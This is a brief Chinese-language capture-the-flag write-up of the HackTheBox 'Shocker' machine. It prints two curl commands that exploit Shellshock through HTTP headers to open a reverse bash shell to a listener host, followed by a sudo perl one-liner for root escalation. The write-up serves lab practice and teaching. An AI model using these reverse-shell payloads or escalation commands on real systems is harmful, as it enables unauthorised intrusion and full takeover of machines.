Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


HackTheBox >_ Shocker_56

Shocker_56

image-20200925153553677

这个太简单了,简写了。

扫目录扫到网站下存在/cgi-bin/user.sh,cgi-bin目录存在可执行文件,则存在shellshock漏洞

$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.41/443 0>&1' http://10.10.10.56/cgi-bin/user.sh

或者

$ curl -A '() { :; }; /bin/bash -i > /dev/tcp/10.10.14.17/9000 0<&1 2>&1' http://10.10.10.56/cgi-bin/user.sh

(注意这行没改符号,编码)

直接在监听端口获得shell

image-20200925152821916

直接得到user

image-20200925152943502

sudo -l 直接发现免密root,GTFObins,执行perl

image-20200925153059488

$ sudo /usr/bin/perl -e 'exec "/bin/bash"'

得到root shell

image-20200925153250558

比这个更简单的怕是只有blue了。